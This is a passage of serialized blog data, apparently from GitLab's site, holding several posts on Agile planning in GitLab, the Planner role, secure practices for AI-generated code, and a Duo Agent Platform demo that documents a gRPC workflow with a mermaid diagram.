charts](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097577/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097576758.png)\n\n## 5 reasons a unified platform provides an advantage\n\nI know there are plenty of planning tools that can handle SAFe ceremonies. But there are game-changing reasons why I genuinely believe GitLab is different:\n\n1. **No more context switching** - Your planning, coding, testing, and security all happen in one place.\n2. **Everything's connected** - You can trace work from the big epic down to the code and deployment.\n3. **Everyone's on the same page** - Developers, product folks, and security teams all work together in the same tool.\n4. **Total visibility** - Stakeholders have one place to check for updates.\n5. **The full picture** - You see planning and development metrics together, so you know what's really going on.\n\nIf your dev teams already love GitLab, why make them jump to another tool for planning or create some complex, cobbled-together integrations? Bringing your SAFe planning into GitLab creates a much smoother experience for everyone.\n\n## Implementation principles\n\nI've worked with teams transitioning from traditional SAFe tools to GitLab, and here's what I've learned: Focus on **what each ceremony is trying to accomplish**, not on recreating exact replicas of your old tools.\n\nThe teams that get the most out of GitLab are the ones who embrace its native capabilities instead of fighting against them. Yes, it takes some initial work to figure out how to map your SAFe concepts and set up your workflows. But once you do, you'll find your processes actually get simpler rather than more complex.\n\nThe key is defining conventions that everyone follows. Which labels mean what? How will you track teams? What goes in an epic versus an issue? With a little upfront investment in these decisions, you'll end up with an intuitive system that eliminates all that cross-tool coordination overhead.\n\n## Getting started\n\nReady to give this a shot? Here's how to start implementing SAFe in GitLab:\n\n1. **Set up your structure** - Create groups and subgroups that [match your organization](https://about.gitlab.com/blog/best-practices-to-set-up-organizational-hierarchies-that-scale/).\n2. **Define your work breakdown** - Decide how you'll use [epics](https://about.gitlab.com/blog/unlocking-agile-excellence-gitlab-epics-for-seamless-portfolio-management/), [issues](https://docs.gitlab.com/user/project/issues/managing_issues/), and [tasks](https://docs.gitlab.com/user/tasks/).\n3. **Create your iterations** - Set up your [sprint schedule](https://docs.gitlab.com/user/group/iterations/#create-an-iteration-cadence).\n4. **Add your milestones** - [Milestones](https://docs.gitlab.com/user/project/milestones/#create-a-milestone) will represent your Program Increments in GitLab.\n5. **Build your boards** - Create different views for different ceremonies.\n6. **Agree on conventions** - Document how you'll use labels and custom fields.\n\nTaking time to think through these decisions upfront will save you many headaches later. And remember, you don't have to perfect it on day one - you can always adjust as you learn.\n\n## Bringing it all together\n\nGitLab gives you a solid foundation for running SAFe, especially if your dev teams are already GitLab fans. When you bring planning and development into the same tool, you eliminate those painful handoffs, make collaboration way easier, and get everything moving faster.\n\nThe beauty of GitLab's planning tools is that they're flexible enough to adapt to your specific flavor of SAFe. You're not locked into rigid workflows - you can evolve your approach as your teams mature and your needs change.\n\n> Ready to see how much better life is without those planning silos? [Start your free trial today](https://about.gitlab.com/free-trial/) and experience firsthand how GitLab can transform your SAFe implementation.\n\n*💡 If you liked this topic check out this related post - [GitLab for Agile Software Development](https://about.gitlab.com/blog/gitlab-for-agile-software-development/)*\n",[784,475,785,757,786],"agile","features","tutorial",{"slug":788,"featured":91,"template":789},"safe-without-silos-in-gitlab","BlogPost",{"content":791,"config":800},{"title":792,"description":793,"authors":794,"heroImage":795,"date":796,"body":797,"category":668,"tags":798},"How to harmonize Agile sprints with product roadmaps","Apply best practices and GitLab features to your product journey, including creating centralized roadmaps, conducting review sessions, and tracking sprint lifecycles.",[779],"https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097231/Blog/Hero%20Images/Blog/Hero%20Images/blog-image-template-1800x945%20%2821%29_2pdp2MNB7SoP4MhhiI1WIa_1750097230664.png","2025-02-04","Picture this: Product and Development teams are working in isolation. Product has created a 12-month roadmap and communicated it to internal stakeholders but didn't review it with their development team. Dev starts building the features planned for the upcoming sprint without considering the broader product roadmap, leading to missed opportunities to optimize timing, like running projects in parallel, accounting for team capacity, or building reusable APIs that could serve multiple initiatives. The lack of coordination results in inefficiencies and delayed value delivery.\n\nBalancing short-term wins with long-term vision isn’t easy; it requires clear communication, aligned priorities, and the right tools. In this guide, you'll learn strategies to help harmonize your Agile sprints with strategic roadmaps, tackle common challenges, and uncover actionable solutions tailored to your teams.\n\n## The importance of a single source of truth\n\nA consistent single source of truth for roadmaps with longer-range goals ensures you and your teams have access to up-to-date information about the bigger picture. In practice, this means maintaining a single, regularly updated platform where all roadmap details reside rather than keeping versions of the roadmap across multiple formats, each typically with slightly different information, causing a misaligned understanding of where you're headed.\n\n### Create a centralized roadmap\n\nBy creating a centralized roadmap for your team, you can:\n\n* communicate long-range strategy\n* minimize miscommunication\n* facilitate cross-functional alignment\n* quickly adapt to changes without losing context\n* self-serve information, reducing dependency on a single point of contact who retains the information\n\n***GitLab tip**: Use [epics](https://docs.gitlab.com/ee/user/group/epics/) and [Roadmap view](https://docs.gitlab.com/ee/user/group/roadmap/) to support both product planning and the transparent monitoring of delivery. The Roadmap view allows you to track progress, identify bottlenecks, and ensure alignment between high-level goals and sprint-level execution.*\n\n![Roadmap view for group](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097239/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097239117.png)\n\n## Collaborative roadmap review practices\n\nEstablish a regular review and sign-off process for roadmap updates that include Product, Engineering, and UX as part of the [product trio](https://www.producttalk.org/product-trio/). Collaborative reviews help you maintain alignment and minimize risk. At GitLab, I meet with my engineering manager and UX designer monthly to review and obtain sign-offs on any changes. We maintain a running sign-off on the roadmap wiki page itself that holds us accountable for keeping the schedule and provides transparency to the rest of the organization.\n\n#### How to extract value from review sessions\n\nTo make the most of the review session, aim for the following best practices:\n\n* Schedule routine reviews, monthly or quarterly, depending on how frequently the roadmap tends to fluctuate at your organization.\n* Validate alignment between product goals, UX lead time, and technical feasibility by discussing potential risks and dependencies upfront.\n  * Validate that the roadmap reflects current organizational business objectives.\n  * Ensure that design timelines are realistic and consider research or validation needs.\n  * Confirm that the roadmap allocates time for technical preparation, such as technical spikes or investigations, and ensures alignment with broader engineering priorities.\n* Optimize team utilization by considering capacity constraints and ensuring the sequence of work aligns with the team’s skill profile. This includes avoiding periods of underutilization or skill mismatches while effectively planning for situations like staffing level drops during holidays.\n* Right-size scope and set appropriate expectations about what can be achieved. We all want to do it all, but perfection is the enemy of progress so prioritize what truly matters to deliver incremental value efficiently. Seek opportunities to optimize by identifying ways to iterate or increase velocity, such as adjusting the order of work to reduce dependencies or leveraging reusable components to streamline development.\n* Encourage open dialogue about trade-offs and priorities to ensure all perspectives are considered. This collaborative approach helps identify creative solutions to challenges and builds consensus on the best path forward.\n\n***GitLab tip**: Use a [GitLab Wiki](https://docs.gitlab.com/ee/user/project/wiki/) page to complement the [Roadmap](https://docs.gitlab.com/ee/user/group/roadmap/) feature. In the wiki, you can include expanded context about your product roadmap, such as business rationale, links to user research, RICE scores, and details about dependencies or risks. Link directly to the roadmap for easy access, and leverage the upcoming discussion threads feature to encourage async collaboration and feedback from your team.*\n\n![PlanFlow product roadmap](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097239/Blog/Content%20Images/Blog/Content%20Images/image3_aHR0cHM6_1750097239118.png)\n\n## Continuous direction validation and progress measurement\n\nThe goal of a product roadmap isn’t just to stay on track – it’s to deliver real value to your customers. To make space for sharing ongoing user feedback and behavioral data consider incorporating regular touchpoints across your product trio outside of sprint cycles. These sessions can be used to review insights, analyze trends, and ensure that the product roadmap continues to reflect the evolving needs of your users. By grounding roadmap updates using real user insights, you’re not only delivering on outcomes but also adapting to what really matters to your customers.\n\nThe value you ship might come in the form of improved usability, reduced technical debt, or entirely new capabilities. When the product trio is aligned on the roadmap vision, they’re also aligned on the outcomes you’re working to achieve.\n\nTo measure whether you’re on track to deliver those outcomes, you need to closely scope the intended results. Scope creep, like late user story additions, can delay your ability to ship value. Additionally, it’s important to identify work that was delivered but doesn’t align with the roadmap and understand why.\n\n### Sprint planning\n\nRemaining aligned with your product roadmap starts with thoughtful sprint planning. Here are some best practices to keep your team on track and focused on delivering value:\n\n* Clearly define, and narrowly scope, desired outcomes to ensure high confidence in delivery.\n* Identify potential late additions or adjustments that could delay delivery, and build in buffers to maintain focus.\n* Align on the sequence of work with your team to optimize for capacity, skill profiles, and reducing dependencies.\n* To maintain focus and improve confidence of delivering on time, avoid planning to 100% of the team’s capacity. Leave room (10%-20%) for unknowns or new discoveries that may surface during the sprint.\n\n### During the sprint\n\nStaying aligned with your roadmap during the sprint requires focus, communication, and constant evaluation. While delivering value is the goal, it’s equally important to ensure the work in progress aligns with the outcomes you’ve scoped and planned.\n\n* Continuously validate the work in progress against roadmap outcomes to ensure every sprint contributes to the bigger picture.\n* Encourage the team to regularly check if they’re still working toward the intended goals and outcomes.\n* Maintain open communication throughout the sprint. Use daily standups or async updates to surface risks, unplanned work, or dependencies early and adjust where necessary.\n* Be ruthless about protecting the sprint. While the urge to solve emerging problems is natural, unplanned work should be carefully evaluated to avoid derailing agreed-upon priorities.\n* Proactively manage scope creep. If new work surfaces mid-sprint, assess whether it aligns with the current roadmap outcome’s narrowly scoped focus. While additional ideas or features may align conceptually with the broader outcome, they may not fit into the immediate plan to deliver value as soon as possible. Document these suggestions and evaluate if they should be considered as part of future iterations or as a nice-to-have for the future, rather than introducing them into the current sprint and delaying agreed-upon priorities.\n\n### Sprint retros\n\nIn your sprint retrospectives, take time to reflect with your team on how well you are collectively progressing toward your desired outcomes. Questions to ask:\n\n* Did any unplanned work get introduced during the sprint that delayed your ability to deliver value? Identify why it happened and what adjustments can be made.\n* Did you deliver any work that deviated from the roadmap? Discuss what led to this and what you can learn for future planning.\n\nFrom sprint planning through retrospectives, staying focused on delivering tangible outcomes to users and stakeholders is a team responsibility. By aligning every step of the way, you ensure that your roadmap remains a clear guide for delivering value efficiently and consistently.\n\n***GitLab tip:** Use [burndown charts](https://docs.gitlab.com/ee/user/project/milestones/burndown_and_burnup_charts.html) to visualize progress and detect deviations early, helping your team stay focused on delivering outcomes.*\n\n![Burndown chart](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097239/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750097239120.png)\n\n## Delivering roadmap outcomes with confidence\n\nHarmonizing Agile sprints with strategic roadmaps requires intentionality, team buy-in, and the proper tools. By creating a roadmap single source of truth, fostering collaborative reviews, and measuring progress towards outcomes, you can align execution with vision. With GitLab’s robust planning features, teams can turn challenges into opportunities for innovation and growth.\n\nReady to align your sprints with your strategic roadmap? [Start a free trial of GitLab](https://about.gitlab.com/free-trial/) today and explore the tools that can help you deliver outcomes with confidence.\n\n## Learn more\n\n- [Agile planning content hub](https://about.gitlab.com/blog/categories/agile-planning/)\n- [GitLab’s new Planner role for Agile planning teams](https://about.gitlab.com/blog/introducing-gitlabs-new-planner-role-for-agile-planning-teams/)\n- [Get to know the GitLab Wiki for effective knowledge management](https://about.gitlab.com/blog/get-to-know-the-gitlab-wiki-for-effective-knowledge-management/)",[784,786,799,475],"workflow",{"slug":801,"featured":91,"template":789},"how-to-harmonize-agile-sprints-with-product-roadmaps",{"content":803,"config":811},{"title":804,"description":805,"authors":806,"heroImage":807,"date":808,"body":809,"category":668,"tags":810},"Introducing GitLab’s new Planner role for Agile planning teams","Learn how GitLab’s new Planner role helps Agile teams manage planning workflows, with tailored access across SaaS, Dedicated, and Self-managed solutions.",[779],"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749662488/Blog/Hero%20Images/blog-image-template-1800x945__3_.png","2024-11-25","GitLab launched a new role within the DevSecOps platform – the Planner. Built to align with GitLab’s strategy of providing flexible, role-based access controls, as demonstrated by the release of [custom roles](https://docs.gitlab.com/ee/user/custom_roles.html), the Planner role gives software development teams and planning-focused users access to the tools they need to manage Agile workflows without over-provisioning permissions that could introduce unnecessary risks. By tailoring access to meet specific user needs, the Planner role ensures teams can stay productive while maintaining security and compliance, adhering to the [principle of least privilege](https://about.gitlab.com/blog/the-ultimate-guide-to-least-privilege-access-with-gitlab/).\n\n## Why we created the Planner role\n\nOur journey to this new role started with feedback from our customers and internal teams. We consistently heard that while GitLab offers comprehensive tools for planning and managing Agile development cycles, there was a need for more specific role-based access controls. Product managers, project leads, and other planning roles often required access to planning features but didn’t need full development permissions. In fact, giving them broader access is undesirable, as it increases security risks and potential for errors, such as making unintended changes to code or sensitive configurations. We listened.\n\nThrough user interviews, competitive analysis, and extensive research, we validated the need for a role that grants full access to planning tools while maintaining security by restricting access to developer-centric features.\n\n## What does the Planner role offer?\n\nThe Planner role is a hybrid of the existing [Guest and Reporter roles](https://docs.gitlab.com/ee/user/permissions.html#roles) but designed specifically for those who need access to planning workflows. \n\nHere’s what you can expect:\n\n* Access to key planning tools like epics, roadmaps, issue boards, and [OKRs](https://docs.gitlab.com/ee/user/okrs.html) (*some features may require a GitLab Premium or Ultimate license*)  \n* Enhanced security by limiting unnecessary access to sensitive development features  \n* The Planner role can be used in conjunction with the Enterprise Agile Planning add-on, providing teams with tailored access to planning tools while maintaining security and control.  (*however, the Planner role itself is available on all license tiers*).\n\nThe Planner role is available across all GitLab solutions, including SaaS, GitLab Dedicated, and Self-managed, ensuring that all customers can benefit from this tailored access.\n\nThis role gives teams the flexibility to align permissions with job functions, creating a balance between accessibility and security.\n\n## How the Planner role supports Agile practices\n\nIn [Agile software development](https://about.gitlab.com/blog/categories/agile-planning/), ensuring that each team member has the right tools and permissions to perform their role is crucial for workflow efficiency. The Planner role supports this by allowing planning team members to fully participate in the planning stages of the software development lifecycle without the risk of overstepping into areas like development or deployment.\n\nFrom creating and managing epics to defining roadmaps, the Planner role gives Agile teams the tools they need to stay aligned and productive.\n\n## Customer-centric design\n\nWe didn’t create this role in isolation. We involved our community in the process every step of the way. Through surveys, interviews, and testing, we fine-tuned the permissions to make sure they fit the real-world needs of product and project managers.\n\nThe role also aligns with GitLab’s long-standing mission to be a platform for enterprise Agile teams, giving businesses the flexibility and control to implement Agile methodologies at scale.\n\n## Community feedback and engagement \n\nWe value your input and encourage you to share your experiences with the new Planner role. Your feedback is essential to help refine and improve your GitLab experience. Please visit our [feedback issue](https://gitlab.com/gitlab-org/gitlab/-/issues/503817) to provide your thoughts and suggestions.\n\n## Start planning with GitLab today!\n\nThe Planner role is just one of the many ways GitLab empowers software development teams to plan, collaborate, and deliver efficiently. Whether you’re looking to streamline your product management workflows, improve team collaboration, or align your Agile practices, GitLab has the tools to help you succeed.\n\n> Ready to experience the full power of GitLab? [Sign up for a free 60-day GitLab Ultimate trial](https://about.gitlab.com/free-trial/) and start planning your next project with the Planner role, tailored to fit your team's unique needs.\n\n## Read more\n- [Beyond Devs: GitLab Enterprise Agile Planning add-on for all roles](https://about.gitlab.com/blog/gitlab-enterprise-agile-planning-add-on-for-all-roles/)\n- [How to use GitLab for Agile software development](https://about.gitlab.com/blog/gitlab-for-agile-software-development/)\n- [First look: The new Agile planning experience in GitLab](https://about.gitlab.com/blog/first-look-the-new-agile-planning-experience-in-gitlab/)",[784,475,785,757],{"slug":812,"featured":91,"template":789},"introducing-gitlabs-new-planner-role-for-agile-planning-teams",{"category":675,"slug":679,"posts":814},[815,827,839],{"content":816,"config":825},{"title":817,"description":818,"authors":819,"heroImage":821,"body":822,"date":823,"category":679,"tags":824},"3 best practices for building software in the era of LLMs","With AI transforming coding speed, developers need new security habits. Learn what they are and how to deploy them throughout the DevSecOps workflow.",[820],"Salman Ladha","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749662523/Blog/Hero%20Images/Gartner_DevOps_Blog_Post_Cover_Image_1800x945__2_.png","AI has rapidly become a core part of modern software development. Not only is it helping developers code faster than ever, but it’s also automating low-level tasks like writing test cases or summarizing documentation. According to our [2024 Global DevSecOps Survey](https://about.gitlab.com/developer-survey/), 81% of developers are already using AI in their workflows or plan to in the next two years.\n\nAs code is written with less manual effort, we’re seeing a subtle but important behavioral change: Developers are beginning to trust AI-generated code with less scrutiny. That confidence — understandable as it may be — can quietly introduce security risks, especially as the overall volume of code increases. Developers can’t be expected to stay on top of every vulnerability or exploit, which is why we need systems and safeguards that scale with them. AI tools are here to stay. So, as security professionals, it’s incumbent on you to empower developers to adopt them in a way that improves both speed and security.\n\nHere are three practical ways to do that. \n\n## Never trust, always verify\n\nAs mentioned above, developers are beginning to trust AI-generated code more readily, especially when it looks clean and compiles without error. To combat this, adopt a zero-trust mindset. While we often talk about [zero trust](https://about.gitlab.com/blog/why-devops-and-zero-trust-go-together/) in the context of identity and access management, the same principle can be applied here with a slightly different framing. Treat AI-generated code like input from a junior developer: helpful, but not production-ready without a proper review. \n\nA developer should be able to explain what the code is doing and why it’s safe before it gets merged. Reviewing AI-generated code might even shape up to be an emerging skillset required in the world of software development. The developers who excel at this will be indispensable because they’ll marry the speed of LLMs with the risk reduction mindset to produce secure code, faster. \n\nThis is where tools like [GitLab Duo Code Review](https://docs.gitlab.com/user/project/merge_requests/duo_in_merge_requests/) can help. As a feature of our AI companion across the software development lifecycle, it brings AI into the code review process, not to replace human judgment, but to enhance it. By surfacing questions, inconsistencies, and overlooked issues in the merge requests, AI can help developers keep up with the very AI that’s accelerating development cycles. \n\n## Prompt for secure patterns\n\nLarge language models ([LLMs](https://about.gitlab.com/blog/what-is-a-large-language-model-llm/))  are powerful, but only as precise as the prompts they’re given. That’s why prompt engineering is becoming a core part of working with AI tools. In the world of LLMs, your input *is* the interface. Developers who learn to write clear, security-aware prompts will play a key role in building safer software from the start.\n\nFor example, vague requests like “build a login form” often produce insecure or overly simplistic results. However, by including more context, such as “build a login form **with** input validation, rate limiting, and hashing, **and** support phishing-resistant authentication methods like passkeys,” you’re more likely to produce an output that meets the security standards of your organization. \n\nRecent [research](https://www.backslash.security/press-releases/backslash-security-reveals-in-new-research-that-gpt-4-1-other-popular-llms-generate-insecure-code-unless-explicitly-prompted) from Backlash Security backs this up. They found that secure prompting improved results across popular LLMs. When developers simply asked models to “write secure code,” success rates remained low. However, when prompts referenced [OWASP best practices](https://cheatsheetseries.owasp.org/cheatsheets/LLM_Prompt_Injection_Prevention_Cheat_Sheet.html), the rate of secure code generation increased. \n\nPrompt engineering should be part of how we train and empower security champions within development teams. Just like we teach secure coding patterns and threat modeling, we should also be teaching developers how to guide AI tools with the same security mindset. \n\n> Learn more with these helpful [prompt engineering tips](https://docs.gitlab.com/development/ai_features/prompt_engineering/).\n\n## Scan everything, no exceptions\n\nThe rise of AI means we’re writing more code, quicker, with the same number of humans. That shift should change how we think about security, not just as a final check, but as an always-on safeguard woven into every aspect of the development process.\n\nMore code means a wider attack surface. And when that code is partially or fully generated, we can’t solely rely on secure coding practices or individual intuition to spot risks. That’s where automated scanning comes in. [Static Application Security Testing (SAST)](https://docs.gitlab.com/user/application_security/sast/), [Software Composition Analysis (SCA)](https://docs.gitlab.com/user/application_security/dependency_scanning/), and [Secret Detection](https://docs.gitlab.com/user/application_security/secret_detection/) become critical controls to mitigate the risk of secret leaks, supply chain attacks, and weaknesses like SQL injections. With platforms like GitLab, [application security](https://about.gitlab.com/solutions/security-compliance/) is natively built into the developer's workflow, making it a natural part of the development lifecycle. Scanners can also trace through the entire program to make sure new AI-generated code is secure *in the context of all the other code* — that can be hard to spot if you’re just looking at some new code in your IDE or in an AI-generated patch.\n\nBut it’s not just about scanning, it’s about keeping pace. If development teams are going to match the speed of AI-assisted development, they need scans that are fast, accurate, and built to scale. Accuracy especially matters. If scanners overwhelm developers with false positives, there’s a risk of losing trust in the system altogether. \n\nThe only way to move fast *and* stay secure is to make scanning non-negotiable. \n\nEvery commit. Every branch. No exceptions.\n\n## Secure your AI-generated code with GitLab\n\nAI is changing the way we build software, but the fundamentals of secure software development still apply. Code still needs to be reviewed. Threats still need to be tested. And security still needs to be embedded in the way we work. At GitLab, that’s exactly what we’ve done. \n\nAs a developer platform, we’re not bolting security onto the workflow — we’re embedding it directly where developers already work: in the IDE, in merge requests, and in the pipeline. Scans run automatically and relevant security context is surfaced to facilitate faster remediation cycles. And, because it’s part of the same platform where developers build, test, and deploy software, there are fewer tools to juggle, less context switching, and a much smoother path to secure code.\n\nAI features like [Duo Vulnerability Explanation and Vulnerability Resolution](https://about.gitlab.com/the-source/ai/understand-and-resolve-vulnerabilities-with-ai-powered-gitlab-duo/) add another layer of speed and insight, helping developers understand risks and fix them faster, without breaking their flow.\n\nAI isn’t a shortcut to security. But with the right practices — and a platform that meets developers where they are — it can absolutely be part of building software that’s fast, secure, and scalable. \n\n> Start your [free 60-day trial of GitLab Ultimate with Duo Enterprise](https://about.gitlab.com/free-trial/) and experience what it’s like to build secure software, faster. With native security scanning, AI-powered insights, and a seamless developer experience, GitLab helps you shift security left without slowing down.","2025-07-10",[675,767],{"featured":91,"template":789,"slug":826},"3-best-practices-for-building-software-in-the-era-of-llms",{"config":828,"content":830},{"slug":829,"featured":91,"template":789},"accelerate-learning-with-gitlab-duo-agent-platform",{"title":831,"description":832,"authors":833,"heroImage":835,"date":836,"category":679,"tags":837,"body":838},"Accelerate learning with GitLab Duo Agent Platform","Learn how agentic AI helped generate comprehensive gRPC documentation in minutes, not hours.",[834],"Halil Coban","Blog/Hero%20Images/Workflow_1800x945.png","2025-07-07",[679,786,757,767],"At GitLab, we continue to expand our AI capabilities so I often find myself learning and working in new codebases. Whether I'm debugging issues, implementing new features, or onboarding to different projects, understanding system architecture quickly is crucial. But let's be honest — manually tracing through complex communication flows, especially gRPC connections, can eat up hours of productive development time.\n\nThis is exactly the type of tedious, yet necessary, work [GitLab Duo Agent Platform](https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/) is designed to handle. Instead of replacing developers, it amplifies our capabilities by automating routine tasks so we can focus on creative problem solving and strategic technical work.\n\nLet me show you how I used [Duo Agent Platform](https://about.gitlab.com/gitlab-duo/agent-platform/) to generate comprehensive documentation for a Golang project's gRPC communication flow — and how it transformed hours of code analysis into a few minutes of guided interaction.\n\nYou can follow along with this video:\n\n\u003Cdiv style=\"padding:75% 0 0 0;position:relative;\">\u003Ciframe src=\"https://player.vimeo.com/video/1098569263?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479\" frameborder=\"0\" allow=\"autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share\" style=\"position:absolute;top:0;left:0;width:100%;height:100%;\" title=\"AI Agent Generates Complete gRPC Documentation in Minutes | GitLab Duo Agent Platform Demo\">\u003C/iframe>\u003C/div>\u003Cscript src=\"https://player.vimeo.com/api/player.js\">\u003C/script>\n\n## The challenge: Understanding gRPC communication flows\n\nI was working with a project called \"Duo Workflow Executor\" that communicates with a gRPC server. Rather than spending my afternoon manually tracing through the codebase to understand the communication patterns, I decided to let Duo Agent Platform handle the heavy lifting.\n\nMy goal was simple: generate a clear diagram showing how the gRPC communication works, including what payloads are received, what actions are executed, and what responses are sent back.\n\nWorking in VS Code with the GitLab Workflow extension installed, I opened the project and crafted a specific prompt for Duo Agent Platform:\n\n\"Can you prepare a mermaid diagram that shows the gRPC connection between duo-workflow-service and this project. It should show what this project receives in gRPC payload, and what actions it executes based on the payload, and what it sends back. Study internal/services/runner/runner.go, especially the Run method, and write the mermaid output to a grpc.md file.\"\n\nDuo Agent Platform didn't just blindly execute my request — it began intelligently gathering context to create a comprehensive execution plan. The platform automatically:\n\n* Searched through relevant Go files in the project  \n* Read the specific file I mentioned (runner.go)  \n* Identified additional files that would provide necessary context  \n* Analyzed the codebase structure to understand the gRPC implementation\n\nThis contextual awareness is what sets agentic AI tools with great context apart from simple code generation tools. Instead of working in isolation, Duo Agent Platform understands the relationships between different components of your project.\n\n## Collaborative refinement\n\nRather than making assumptions, Duo Agent Platform is designed to keep a human in the loop at critical moments in task execution to deliver better results. In this scenario, the platform paused to ask clarifying questions about the level of detail I wanted. \n\n**Agent:** \"Should I include error handling details in the diagram?\" \n\n**Me:** \"Don't focus on error handling. Include all actions. Focus on gRPC payload.\"\n\nThis back-and-forth refinement is crucial. The agent isn't just executing commands — it's working with me to ensure the deliverable meets my specific requirements.\n\n## Execution and results\n\nWith the clarified requirements, Duo Agent Platform finalized its execution plan and requested confirmation before proceeding. I could have modified the approach at this stage, but the plan was perfectly aligned with what I needed.\n\nThe agent then executed each task in sequence, providing real-time progress updates. Within minutes, it had:\n\n* Analyzed all relevant files across the project  \n* Created comprehensive documentation with a detailed mermaid diagram  \n* Saved everything to the requested grpc.md file  \n* Included valuable context about outgoing payloads and connection management\n\nThe resulting documentation wasn't just a basic diagram — it was thorough, accurate, and immediately useful for understanding the system architecture.\n\n## Reviewing the output\n\nHere's the actual mermaid diagram that Duo Agent Platform created, showing the complete gRPC communication flow:\n\n```mermaid\nsequenceDiagram\nparticipant DWS as duo-workflow-service\nparticipant DWE as duo-workflow-executor\nparticipant Runner as ExecutionRunner\nparticipant ActionExecutor as Action Executor\nparticipant FileSystem as File System/Commands\n\n\nNote over DWS, DWE: gRPC Bidirectional Streaming (ExecuteWorkflow)\n\n%% Connection Establishment\nDWE->>DWS: gRPC Connection with Headers\nNote over DWE, DWS: Headers: authorization (Bearer token)\u003Cbr/>x-gitlab-authentication-type: oidc\u003Cbr/>x-gitlab-realm, x-gitlab-global-user-id\u003Cbr/>x-gitlab-oauth-token, x-gitlab-base-url\u003Cbr/>x-gitlab-instance-id, x-request-id\u003Cbr/>x-gitlab-namespace-id, x-gitlab-project-id\n\n\n%% Workflow Start Request\nDWE->>DWS: ClientEvent{StartWorkflowRequest}\nNote over DWE, DWS: StartWorkflowRequest:\u003Cbr/>- ClientVersion\u003Cbr/>- WorkflowDefinition\u003Cbr/>- Goal\u003Cbr/>- WorkflowID\u003Cbr/>- WorkflowMetadata\u003Cbr/>- ClientCapabilities[]\n\n\n%% Action Processing Loop\nloop Action Processing\n    DWS->>DWE: Action Message\n    Note over DWS, DWE: Action Types:\u003Cbr/>- Action_RunCommand {program, flags[], arguments[]}\u003Cbr/>- Action_RunGitCommand {command, arguments[], repositoryUrl}\u003Cbr/>- Action_RunReadFile {filepath}\u003Cbr/>- Action_RunWriteFile {filepath, contents}\u003Cbr/>- Action_RunEditFile {filepath, oldString, newString}\u003Cbr/>- Action_RunHTTPRequest {method, path, body}\u003Cbr/>- Action_ListDirectory {directory}\u003Cbr/>- Action_FindFiles {namePattern}\u003Cbr/>- Action_Grep {searchDirectory, pattern, caseInsensitive}\u003Cbr/>- Action_NewCheckpoint {}\u003Cbr/>- Action_RunMCPTool {}\n\n\n    DWE->>Runner: Receive Action\n    Runner->>Runner: processWorkflowActions()\n    Runner->>ActionExecutor: executeAction(ctx, action)\n    \n    alt Action_RunCommand\n        ActionExecutor->>FileSystem: Execute Shell Command\n        Note over ActionExecutor, FileSystem: Executes: program + flags + arguments\u003Cbr/>in basePath directory\n        FileSystem-->>ActionExecutor: Command Output + Exit Code\n    \n    else Action_RunReadFile\n        ActionExecutor->>FileSystem: Read File\n        Note over ActionExecutor, FileSystem: Check gitignore rules\u003Cbr/>Read file contents\n        FileSystem-->>ActionExecutor: File Contents\n    \n    else Action_RunWriteFile\n        ActionExecutor->>FileSystem: Write File\n        Note over ActionExecutor, FileSystem: Check gitignore rules\u003Cbr/>Create/overwrite file\n        FileSystem-->>ActionExecutor: Success/Error Message\n    \n    else Action_RunEditFile\n        ActionExecutor->>FileSystem: Edit File\n        Note over ActionExecutor, FileSystem: Read → Replace oldString with newString → Write\u003Cbr/>Check gitignore rules\n        FileSystem-->>ActionExecutor: Edit Result Message\n    \n    else Action_RunGitCommand\n        ActionExecutor->>FileSystem: Execute Git Command \n        Note over ActionExecutor, FileSystem: Git operations with authentication\u003Cbr/>Uses provided git config\n        FileSystem-->>ActionExecutor: Git Command Output\n    \n    else Action_RunHTTPRequest\n        ActionExecutor->>DWS: HTTP Request to GitLab API\n        Note over ActionExecutor, DWS: Method: GET/POST/PUT/DELETE\u003Cbr/>Path: API endpoint\u003Cbr/>Body: Request payload\u003Cbr/>Headers: Authorization\n        DWS-->>ActionExecutor: HTTP Response\n    \n    else Action_ListDirectory\n        ActionExecutor->>FileSystem: List Directory Contents\n        Note over ActionExecutor, FileSystem: Respect gitignore rules\n        FileSystem-->>ActionExecutor: Directory Listing\n    \n    else Action_FindFiles\n        ActionExecutor->>FileSystem: Find Files by Pattern\n        Note over ActionExecutor, FileSystem: Recursive search with name pattern\u003Cbr/>Respect gitignore rules\n        FileSystem-->>ActionExecutor: File Paths List\n    \n    else Action_Grep\n        ActionExecutor->>FileSystem: Search Text Pattern\n        Note over ActionExecutor, FileSystem: Recursive text search\u003Cbr/>Case sensitive/insensitive option\n        FileSystem-->>ActionExecutor: Search Results\n    \n    else Action_NewCheckpoint/Action_RunMCPTool\n        ActionExecutor->>ActionExecutor: No-op Action\n        Note over ActionExecutor: Returns empty success result\n    end\n\n\n    ActionExecutor-->>Runner: Action Result (string)\n    \n    alt Result Size Check\n        Runner->>Runner: Check if result > 4MB\n        Note over Runner: If result exceeds MaxMessageSize (4MB)\u003Cbr/>Replace with error message about size limit\n    end\n\n\n    Runner->>DWE: ActionResponse\n    DWE->>DWS: ClientEvent{ActionResponse}\n    Note over DWE, DWS: ActionResponse:\u003Cbr/>- RequestID (matches Action.RequestID)\u003Cbr/>- Response (execution result string)\nend\n\n\n%% Workflow Completion\nDWE->>DWS: CloseSend()\nNote over DWE, DWS: Signal end of workflow execution\n\n\n%% Analytics and Cleanup\nRunner->>Runner: Send Analytics Event (Finish)\nDWE->>DWE: Token Revocation (if enabled)\nDWE->>DWS: Close gRPC Connection\n```\n\n\nThis diagram reveals several important architectural insights that would have taken considerable time to extract manually:\n\n* **Bidirectional communication:** The workflow executor both initiates requests and responds to service actions. \n* **Rich payload structure:** Each action type has specific parameters and expected responses.  \n* **Multiple integration points:** The executor interacts with local filesystem, Git repositories, and GitLab APIs.  \n* **Comprehensive action set:** Nine different action types handle everything from file operations to HTTP requests.  \n* **Proper lifecycle management:** Clear connection establishment and teardown 